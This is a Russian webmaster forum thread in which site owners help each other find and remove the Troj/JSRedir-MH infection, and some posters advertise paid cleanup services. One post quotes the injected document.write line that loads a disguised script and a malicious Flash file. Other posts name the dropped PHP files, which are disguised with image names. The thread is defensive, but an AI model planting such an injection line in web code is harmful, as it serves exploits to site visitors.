Яндекс нашел вирус на сайте

S
На сайте с 21.04.2010
Offline
26
#271

Troj/JSRedir-MH данный вирус также создает несколько php файлов, у меня они находились в папке с вирусным js и в соседних папках.

D
На сайте с 16.10.2013
Offline
0
#272
iklim:
Еще стоит обратить внимание на тот swf файл, путь к которому зашифрован в скрипте.
И собственно не забыть удалить этот swf файл.
На хабре писали как дешифрировать http://habrahabr.ru/post/196882/

Спасибо, swf файл удалил, нашёл просто поиском по шаблону всех файлов с таким расширением, их у нас не так и много, "левый" сразу видно.

sibirov:
Troj/JSRedir-MH данный вирус также создает несколько php файлов, у меня они находились в папке с вирусным js и в соседних папках.

То же самое. Кстати их у меня легко нашёл на скачанном бэкапе вебовский cureit. Они лежали в папках с картинками, и имена взяли с одной из картинок в этих папках, только с расширением php. Вот так обзывались: gradient2b.php и no_avatar17.php.

iklim:
Вирусописатели на славу постарались )

Руки бы им по отрывать😡

T5
На сайте с 01.09.2009
Offline
30
#273

Доброго дня!

Troj/JSRedir-MH в корне сайта

380точкаby

может кто подскажет где этот гребаный js.

Спасибо.

OG
На сайте с 09.10.2013
Offline
2
#274

В конце /js/slide.js втавка

document.write("<scr"+"ipt src='/admin/media/js/jquery.js'><"+"/script>"); 

там скрипт который всавляет флешку /admin/media/images/forward_enabled.swf

R
На сайте с 24.01.2008
Offline
180
#275
topgun555:
Доброго дня!
Troj/JSRedir-MH в корне сайта
380точкаby
может кто подскажет где этот гребаный js.
Спасибо.

Это все вы удаляете последствия, но не причину, вам обязательно нужно проверить ваш рабочий код движка.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
G
На сайте с 19.10.2013
Offline
0
#276

Народ помогите... На днях подцепил это чудо и не могу его отыскать😡 Посмотрите на сайте:intercon(точка)in(точка)ua Зарание благодарен

T5
На сайте с 01.09.2009
Offline
30
#277
oneGog:
В конце /js/slide.js втавка
document.write("<scr"+"ipt src='/admin/media/js/jquery.js'><"+"/script>"); 

там скрипт который всавляет флешку /admin/media/images/forward_enabled.swf

Спасибо, за подсказу, во флехе Exploit.SWF.254 зашит.

D
На сайте с 16.10.2013
Offline
0
#278
Rxp:
Это все вы удаляете последствия, но не причину, вам обязательно нужно проверить ваш рабочий код движка.

Как это сделать?

W
На сайте с 19.10.2013
Offline
0
#279
gipnoz:
Народ помогите... На днях подцепил это чудо и не могу его отыскать😡 Посмотрите на сайте:intercon(точка)in(точка)ua Зарание благодарен

Вот инструкция по этому вирусу - http://www.w2b.com.ua/audit/552-kak-udalit-virus-trojjsredir-mh-s-sajta.html

в Вашем конктретном случае то вирус с s5_dropdown файла начинается ☝

если сами не разберетесь, то обращайтесь в skype: w2b.kz или на мейл - support@w2b.kz , сделаем за 25$/200грн/800руб за 2-72 часа вернетесь в выдачу Яндекса нормальными.

K5
На сайте с 21.07.2010
Offline
209
#280

gipnoz, в самом конце начиная с document.write /modules/mod_virtuemart_s5_dropdown_cart/s5_dropdown/s5_dropdown.js

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий